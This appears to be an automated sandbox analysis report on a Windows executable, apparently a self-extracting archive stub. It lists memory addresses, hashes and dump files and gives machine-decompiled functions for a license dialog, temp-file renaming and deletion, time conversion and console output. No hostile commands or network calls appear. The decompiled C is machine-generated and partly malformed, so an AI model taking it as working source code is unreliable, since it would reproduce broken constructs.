0x0016239e
0x001623a0
0x001623a2
0x001623a2
0x001623a5
0x001623ae
0x001623b3
0x001623b3
0x001623b7
0x001623be
0x001623c7
0x001623c7
0x001623cd
0x001623d4
0x001623dd
0x001623dd
0x001623e3
0x00000000
0x001623e3
0x001622f3
0x00000000
0x00000000
0x001622fd
0x0016230b
0x0016230b
0x0016230e
0x00162317
0x0016231c
0x0016231d
0x00000000
0x0016231d
0x001627c6
0x001627c6
0x001627c6
0x001627ca
0x001627d0
0x001627d5
0x00000000
0x00000000
0x00000000
0x001627d5
0x0016229f
0x001621ff
0x001621d0
0x001627dd

Strings

xc%u, xrefs: 001626D7
;%u, xrefs: 00162497
x%u, xrefs: 0016267A

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 84626cb67c96e46dcccefffebf26860be6426f758fc4fbc6320b63e2062d4fb2
Instruction ID: 9f42eb5e4fa42b55ca0f0e36ba77387d920c2b1e61152eb959b97fe24023150d
Opcode Fuzzy Hash: 84626cb67c96e46dcccefffebf26860be6426f758fc4fbc6320b63e2062d4fb2
Instruction Fuzzy Hash: 06F1F6716087805BDB25EF38CC95BFE77966FA4300F084569FC868B283DB749964C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0017ACD0, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0017ACD0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E0016130B(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E0017CD2E(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0x1ac574;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0x1b6b7c;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x1bec94;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0x1c20c8(0xf));
					 *0x1c20c4(_t34);
					_t30 =  *0x1a8444; // 0x0
					E00179635(_t30, __eflags,  *0x1a0ed4, _t37,  *0x1bec90, 0, 0);
					L001835CE( *0x1bec94);
					L001835CE( *0x1bec90);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x0017acd0
0x0017acd1
0x0017acd7
0x0017acde
0x0017acf7
0x0017ade3
0x0017ade5
0x00000000
0x0017ade5
0x0017acfd
0x0017ad03
0x0017ad30
0x0017ad35
0x0017ad3a
0x0017ad3c
0x0017ad47
0x0017ad47
0x0017ad4d
0x0017ad52
0x0017ad54
0x0017ad60
0x0017ad60
0x0017ad66
0x0017ad6b
0x0017ad6d
0x0017ad71
0x0017ad71
0x0017ad86
0x0017ad8e
0x0017ada4
0x0017adab
0x0017adb1
0x0017adc6
0x0017add1
0x0017addc
0x00000000
0x0017ade2
0x0017ad08
0x0017ad17
0x00000000
0x0017ad17
0x0017ad0d
0x0017ad10
0x0017ad2b
0x0017ad1f
0x0017ad20
0x00000000
0x0017ad20
0x0017ad15
0x0017ad1e
0x00000000
0x0017ad1e
0x00000000

APIs

Part of subcall function 0016130B: GetDlgItem.USER32(00000000,00003021), ref: 0016134F
Part of subcall function 0016130B: SetWindowTextW.USER32(00000000,001935B4), ref: 00161365

EndDialog.USER32(?,00000001), ref: 0017AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 0017AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0017AD60
SetWindowTextW.USER32(?,?), ref: 0017AD71
GetDlgItem.USER32(?,00000065), ref: 0017AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0017AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0017ADA4

Strings

LICENSEDLG, xrefs: 0017ACE4

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 51e861e2ee3e9d5df487c7a6a1dd9101b1498d1cdfca7bedec3cf509b2f183d2
Instruction ID: 723f779ef8e505a1ca42e26887cfef86abd64c3a428b84a446e010ad8b7b54f1
Opcode Fuzzy Hash: 51e861e2ee3e9d5df487c7a6a1dd9101b1498d1cdfca7bedec3cf509b2f183d2
Instruction Fuzzy Hash: 9E21D632244204BBD2355FA1ED49E7F3F7CFB8AB46F054115F609A2CA0CB619991D632

Uniqueness

Uniqueness Score: -1.00%

Function 00169443, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00169443(void* __ecx) {
				void* __esi;
				void* _t31;
				short _t32;
				long _t34;
				void* _t39;
				short _t41;
				void* _t65;
				intOrPtr _t68;
				void* _t76;
				intOrPtr _t79;
				void* _t81;
				WCHAR* _t82;
				void* _t84;
				void* _t86;

				E0017E28C(E00191E7C, _t84);
				E0017E360();
				_t82 =  *(_t84 + 8);
				_t31 = _t84 - 0x4038;
				__imp__GetLongPathNameW(_t82, _t31, 0x800, _t76, _t81, _t65);
				if(_t31 == 0 || _t31 >= 0x800) {
					L20:
					_t32 = 0;
					__eflags = 0;
				} else {
					_t34 = GetShortPathNameW(_t82, _t84 - 0x5038, 0x800);
					if(_t34 == 0) {
						goto L20;
					} else {
						_t91 = _t34 - 0x800;
						if(_t34 >= 0x800) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t84 - 0x10)) = E0016BC85(_t91, _t84 - 0x4038);
							_t78 = E0016BC85(_t91, _t84 - 0x5038);
							_t68 = 0;
							if( *_t38 == 0) {
								goto L20;
							} else {
								_t39 = E001717AC( *((intOrPtr*)(_t84 - 0x10)), _t78);
								_t93 = _t39;
								if(_t39 == 0) {
									goto L20;
								} else {
									_t41 = E001717AC(E0016BC85(_t93, _t82), _t78);
									if(_t41 != 0) {
										goto L20;
									} else {
										 *(_t84 - 0x1010) = _t41;
										_t79 = 0;
										while(1) {
											_t95 = _t41;
											if(_t41 != 0) {
												break;
											}
											E0016FE56(_t84 - 0x1010, _t82, 0x800);
											E0016400A(E0016BC85(_t95, _t84 - 0x1010), 0x800, L"rtmp%d", _t79);
											_t86 = _t86 + 0x10;
											if(E0016A180(_t84 - 0x1010) == 0) {
												_t41 =  *(_t84 - 0x1010);
											} else {
												_t41 = 0;
												 *(_t84 - 0x1010) = 0;
											}
											_t79 = _t79 + 0x7b;
											if(_t79 < 0x2710) {
												continue;
											} else {
												_t98 = _t41;
												if(_t41 == 0) {
													goto L20;
												} else {
													break;
												}
											}
											goto L21;
										}
										E0016FE56(_t84 - 0x3038, _t82, 0x800);
										_push(0x800);
										E0016BCFB(_t98, _t84 - 0x3038,  *((intOrPtr*)(_t84 - 0x10)));
										if(MoveFileW(_t84 - 0x3038, _t84 - 0x1010) == 0) {
											goto L20;
										} else {
											E00169619(_t84 - 0x2038);
											 *((intOrPtr*)(_t84 - 4)) = _t68;
											if(E0016A180(_t82) == 0) {
												_push(0x12);
												_push(_t82);
												_t68 = E0016971E(_t84 - 0x2038);
											}
											MoveFileW(_t84 - 0x1010, _t84 - 0x3038);
											if(_t68 != 0) {
												E001696D0(_t84 - 0x2038);
												E00169817(_t84 - 0x2038, _t82);
											}
											E00169653(_t84 - 0x2038, _t82);
											_t32 = 1;
										}
									}
								}
							}
						}
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t32;
			}

0x00169448
0x00169452
0x00169459
0x0016945c
0x0016946b
0x00169473
0x00169604
0x00169604
0x00169604
0x00169481
0x0016948a
0x00169492
0x00000000
0x00169498
0x00169498
0x0016949a
0x00000000
0x001694a0
0x001694ac
0x001694bb
0x001694bd
0x001694c2
0x00000000
0x001694c8
0x001694cc
0x001694d1
0x001694d3
0x00000000
0x001694d9
0x001694e1
0x001694e8
0x00000000
0x001694ee
0x001694ee
0x001694f5
0x001694f7
0x001694f7
0x001694fa
0x00000000
0x00000000
0x00169509
0x00169526
0x0016952b
0x0016953c
0x00169549
0x0016953e
0x0016953e
0x00169540
0x00169540
0x00169550
0x00169559
0x00000000
0x0016955b
0x0016955b
0x0016955e
0x00000000
0x00000000
0x00000000
0x00000000
0x0016955e
0x00000000
0x00169559
0x00169572
0x00169577
0x00169582
0x0016959d
0x00000000
0x0016959f
0x001695a5
0x001695ab
0x001695b5
0x001695b7
0x001695b9
0x001695c5
0x001695c5
0x001695d5
0x001695dd
0x001695e5
0x001695f0
0x001695f0
0x001695fb
0x00169600
0x00169600
0x0016959d
0x001694e8
0x001694d3
0x001694c2
0x0016949a
0x00169492
0x00169606
0x0016960c
0x00169616

APIs

__EH_prolog.LIBCMT ref: 00169448
GetLongPathNameW.KERNEL32 ref: 0016946B
GetShortPathNameW.KERNEL32 ref: 0016948A

Part of subcall function 001717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0016BB05,00000000,.exe,?,?,00000800,?,?,001785DF,?), ref: 001717C2

_swprintf.LIBCMT ref: 00169526

Part of subcall function 0016400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0016401D

MoveFileW.KERNEL32(?,?), ref: 00169595
MoveFileW.KERNEL32(?,?), ref: 001695D5

Strings

rtmp%d, xrefs: 0016950F

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: b3cf6046aa264866b8652e3cd21f1c0cb38f283a02cbc243c3343cb42f51c27d
Instruction ID: ba9f077d3ddd834261af3a5eb8c58d3f3b36443554fd239606a087fd20c7f80a
Opcode Fuzzy Hash: b3cf6046aa264866b8652e3cd21f1c0cb38f283a02cbc243c3343cb42f51c27d
Instruction Fuzzy Hash: D3414D71900258A7CF20EBA4CD85AEE777CAF25380F0444E6B559E3042EB748BE9CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00170A8A, Relevance: 12.1, APIs: 8, Instructions: 115
timeCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00170A8A(intOrPtr* __ecx, intOrPtr __edx, void* __eflags, signed int* _a4) {
				struct _SYSTEMTIME _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v56;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _t73;
				void* _t81;
				signed int _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				signed int* _t91;
				signed int _t92;

				_t87 = __edx;
				_t90 = __ecx;
				_v80 = E0017E900( *__ecx,  *((intOrPtr*)(__ecx + 4)), 0x64, 0);
				_v76 = _t87;
				if(E0016ACF5() >= 0x600) {
					FileTimeToSystemTime( &_v64,  &_v32);
					SystemTimeToTzSpecificLocalTime(0,  &_v32,  &_v16);
					SystemTimeToFileTime( &_v16,  &_v72);
					SystemTimeToFileTime( &_v32,  &_v56);
					asm("sbb ecx, [esp+0x24]");
					asm("sbb ecx, ebx");
					asm("adc ecx, ebx");
					_v72.dwLowDateTime = 0 - _v56.dwLowDateTime + _v72.dwLowDateTime + _v64.dwLowDateTime;
					asm("adc ecx, ebx");
					_v72.dwHighDateTime = _v72.dwHighDateTime + _v64.dwHighDateTime;
				} else {
					FileTimeToLocalFileTime( &_v64,  &_v72);
				}
				FileTimeToSystemTime( &_v72,  &_v48);
				_t91 = _a4;
				_t81 = 1;
				_t85 = _v48.wDay & 0x0000ffff;
				_t92 = _v48.wMonth & 0x0000ffff;
				_t88 = _v48.wYear & 0x0000ffff;
				_t91[3] = _v48.wHour & 0x0000ffff;
				_t91[4] = _v48.wMinute & 0x0000ffff;
				_t91[5] = _v48.wSecond & 0x0000ffff;
				_t91[7] = _v48.wDayOfWeek & 0x0000ffff;
				 *_t91 = _v48.wYear & 0x0000ffff;
				_t91[1] = _t92;
				_t91[2] = _t85;
				_t91[8] = _t85 - 1;
				if(_t92 > 1) {
					_t89 = 0x19e084;
					_t86 = 4;
					while(_t86 <= 0x30) {
						_t86 = _t86 + 4;
						_t91[8] = _t91[8] +  *_t89;
						_t89 = _t89 + 4;
						_t81 = _t81 + 1;
						if(_t81 < _t92) {
							continue;
						}
						break;
					}
					_t88 = _v48.wYear & 0x0000ffff;
				}
				if(_t92 > 2 && E00170BF7(_t88) != 0) {
					_t91[8] = _t91[8] + 1;
				}
				_t73 = E0017E970( *_t90,  *((intOrPtr*)(_t90 + 4)), 0x3b9aca00, 0);
				_t91[6] = _t73;
				return _t73;
			}

0x00170a8a
0x00170a91
0x00170aa2
0x00170aa6
0x00170ab4
0x00170ad2
0x00170ae3
0x00170af3
0x00170b03
0x00170b15
0x00170b1d
0x00170b23
0x00170b29
0x00170b2d
0x00170b2f
0x00170ab6
0x00170ac0
0x00170ac0
0x00170b3d
0x00170b43
0x00170b4e
0x00170b4f
0x00170b54
0x00170b59
0x00170b5e
0x00170b66
0x00170b6e
0x00170b76
0x00170b7c
0x00170b7e
0x00170b81
0x00170b84
0x00170b89
0x00170b8d
0x00170b92
0x00170b93
0x00170b9a
0x00170b9d
0x00170ba0
0x00170ba3
0x00170ba6
0x00000000
0x00000000
0x00000000
0x00170ba6
0x00170ba8
0x00170ba8
0x00170bb0
0x00170bbc
0x00170bbc
0x00170bcb
0x00170bd1
0x00170bda

APIs

__aulldiv.LIBCMT ref: 00170A9D

Part of subcall function 0016ACF5: GetVersionExW.KERNEL32(?), ref: 0016AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00170AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00170AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00170AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00170AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00170B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00170B3D
__aullrem.LIBCMT ref: 00170BCB

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 910eb9eb138195f4ac6bdc49a8c7d700332642e1c3b65c67ade7b2c355c82114
Instruction ID: 1fc777eb1412115f9248468982870694798ff9b1fa8b71143142d8286c031327
Opcode Fuzzy Hash: 910eb9eb138195f4ac6bdc49a8c7d700332642e1c3b65c67ade7b2c355c82114
Instruction Fuzzy Hash: D14129B5408306DFC710DF65C88096BFBF8FB88715F048A2EF59692650E735E688CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0018EE2D, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0018EE2D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x19e668; // 0xd6971696
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x1c1298 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x1c1298 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00189F27(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x1c1298 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x1c1298 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x1c1298 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00188ADA( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00188ADA();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0017EC4A(_v8 ^ _t136);
			}

0x0018ee35
0x0018ee3c
0x0018ee3f
0x0018ee47
0x0018ee4b
0x0018ee57
0x0018ee5a
0x0018ee5d
0x0018ee64
0x0018ee6c
0x0018ee6f
0x0018ee75
0x0018ee7b
0x0018ee80
0x0018ee82
0x0018ee85
0x0018ee8a
0x0018ee94
0x0018ee9b
0x0018ee9e
0x0018eea5
0x0018eeac
0x0018eed8
0x0018eefe
0x0018ef00
0x00000000
0x0018eeda
0x0018eedd
0x0018efa4
0x0018efb0
0x0018efbb
0x0018efc0
0x0018eee3
0x0018eeea
0x0018eeef
0x0018eef5
0x0018eefb
0x00000000
0x0018eefb
0x0018eef5
0x0018eedd
0x0018eeae
0x0018eeb2
0x0018eeb5
0x0018eebb
0x0018eebd
0x0018eec0
0x0018eec4
0x0018ef01
0x0018ef04
0x0018ef05
0x0018ef0a
0x0018ef10
0x0018ef16
0x0018ef25
0x0018ef2b
0x0018ef31
0x0018ef36
0x0018ef52
0x0018efc5
0x0018efcb
0x0018ef54
0x0018ef5c
0x0018ef65
0x0018ef6b
0x00000000
0x0018ef6d
0x0018ef6f
0x0018ef72
0x0018ef8b
0x00000000
0x0018ef8d
0x0018ef91
0x0018ef93
0x0018ef96
0x00000000
0x0018ef96
0x0018ef91
0x0018ef8b
0x0018ef6b
0x0018ef65
0x0018ef52
0x0018ef36
0x0018ef10
0x00000000
0x0018ef99
0x0018ef99
0x0018efcd
0x0018efdf

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0018F5A2,?,00000000,?,00000000,00000000), ref: 0018EE6F
__fassign.LIBCMT ref: 0018EEEA
__fassign.LIBCMT ref: 0018EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0018EF2B
WriteFile.KERNEL32(?,?,00000000,0018F5A2,00000000,?,?,?,?,?,?,?,?,?,0018F5A2,?), ref: 0018EF4A
WriteFile.KERNEL32(?,?,00000001,0018F5A2,00000000,?,?,?,?,?,?,?,?,?,0018F5A2,?), ref: 0018EF83

Memory Dump Source

Source File: 00000004.00000002.660423255.0000000000161000.00000020.00020000.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.660415569.0000000000160000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660448924.0000000000193000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.660460357.000000000019E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660470418.00000000001A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660483667.00000000001C1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.660489666.00000000001C2000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7f469ca96edb7dbf94ee32c20416e36e80e26a2881083707d39bc0323c44c88b
Instruction ID: 4af18b61bdccd4ed3867d1e051b4ce538c885d73949dfe3dcd070007c70aaedc
Opcode Fuzzy Hash: 7f469ca96edb7dbf94ee32c20416e36e80e26a2881083707d39bc0323c44c88b
Instruction Fuzzy Hash: 0E51C571A00249AFDB14DFA8DC85AEEBBF9EF09310F24415AE555E7291E7309A50CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0017C534, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0017C534(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t272;
				signed int _t286;
				void* _t289;
				signed int _t290;
				void* _t294;

				L0:
				while(1) {
					L0:
					_t272 = __ebx;
					if(__ebx != 1) {
						goto L122;
					}
					L106:
					__eax = __ebp - 0x7d50;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7d50) = __ebp - 0x7d50;
					E0016B207(__eflags, __ebp - 0x7d50, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L108:
						_push( *0x19e5f8);
						__ebp - 0x7d50 = E0016400A(0x1a946a, __edi, L"%s%s%u", __ebp - 0x7d50);
						__eax = E0016A180(0x1a946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L107:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L109:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x1a946a);
					__eflags =  *(__ebp - 0x3508);
					if( *(__ebp - 0x3508) == 0) {
						while(1) {
							L172:
							_push(0x1000);
							_t208 = _t294 - 0x15; // 0xffffcae3
							_t209 = _t294 - 0xd; // 0xffffcaeb
							_t210 = _t294 - 0x3508; // 0xffff95f0
							_t211 = _t294 - 0xfd58; // 0xfffecda0
							_push( *((intOrPtr*)(_t294 + 0xc)));
							_t220 = E0017AA36();
							_t272 =  *((intOrPtr*)(_t294 + 0x10));
							 *((intOrPtr*)(_t294 + 0xc)) = _t220;
							if(_t220 != 0) {
								_t221 = _t294 - 0x3508;
								_t289 = _t294 - 0x1bd58;
								_t286 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E001717AC(_t294 - 0xfd58,  *((intOrPtr*)(0x19e618 + _t290 * 4))) != 0) {
								_t290 = _t290 + 1;
								if(_t290 < 0xe) {
									continue;
								} else {
									goto L172;
								}
							}
							__eflags = _t290 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t290 * 4 +  &M0017CAA1))) {
								case 0:
									L9:
									__eflags = _t272 - 2;
									if(_t272 == 2) {
										E00179DA4(_t294 - 0x7d50, 0x800);
										E0016A49D(E0016B965(_t294 - 0x7d50, _t294 - 0x3508, _t294 - 0xdd58, 0x800), _t272, _t294 - 0x8d58, _t290);
										 *(_t294 - 4) = 0;
										E0016A5D7(_t294 - 0x8d58, _t294 - 0xdd58);
										E001670BF(_t294 - 0x5d50);
										while(1) {
											L23:
											_push(0);
											_t280 = _t294 - 0x8d58;
											_t235 = E0016A52A(_t294 - 0x8d58, _t285, _t294 - 0x5d50);
											__eflags = _t235;
											if(_t235 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t294 - 0x5d50, 0);
											__eflags =  *(_t294 - 0x4d44);
											if(__eflags == 0) {
												L16:
												_t239 = GetFileAttributesW(_t294 - 0x5d50);
												__eflags = _t239 - 0xffffffff;
												if(_t239 == 0xffffffff) {
													continue;
												}
												L17:
												_t241 = DeleteFileW(_t294 - 0x5d50);
												__eflags = _t241;
												if(_t241 != 0) {
													continue;
												} else {
													_t292 = 0;
													_push(0);
													goto L20;
													L20:
													E0016400A(_t294 - 0x1108, 0x800, L"%s.%d.tmp", _t294 - 0x5d50);
													_t296 = _t296 + 0x14;
													_t246 = GetFileAttributesW(_t294 - 0x1108);
													__eflags = _t246 - 0xffffffff;
													if(_t246 != 0xffffffff) {
														_t292 = _t292 + 1;
														__eflags = _t292;
														_push(_t292);
														goto L20;
													} else {
														_t249 = MoveFileW(_t294 - 0x5d50, _t294 - 0x1108);
														__eflags = _t249;
														if(_t249 != 0) {
															MoveFileExW(_t294 - 0x1108, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E0016B4F7(_t280, __eflags, _t294 - 0x7d50, _t294 - 0x1108, 0x800);
											E0016B207(__eflags, _t294 - 0x1108, 0x800);
											_t293 = E001835B3(_t294 - 0x7d50);
											__eflags = _t293 - 4;
											if(_t293 < 4) {
												L14:
												_t260 = E0016B925(_t294 - 0x3508);
												__eflags = _t260;
												if(_t260 != 0) {
													break;
												}
												L15:
												_t263 = E001835B3(_t294 - 0x5d50);
												__eflags = 0;
												 *((short*)(_t294 + _t263 * 2 - 0x5d4e)) = 0;
												E0017F350(0x800, _t294 - 0x40, 0, 0x1e);
												_t296 = _t296 + 0x10;
												 *((intOrPtr*)(_t294 - 0x3c)) = 3;
												_push(0x14);
												_pop(_t266);
												 *((short*)(_t294 - 0x30)) = _t266;
												 *((intOrPtr*)(_t294 - 0x38)) = _t294 - 0x5d50;
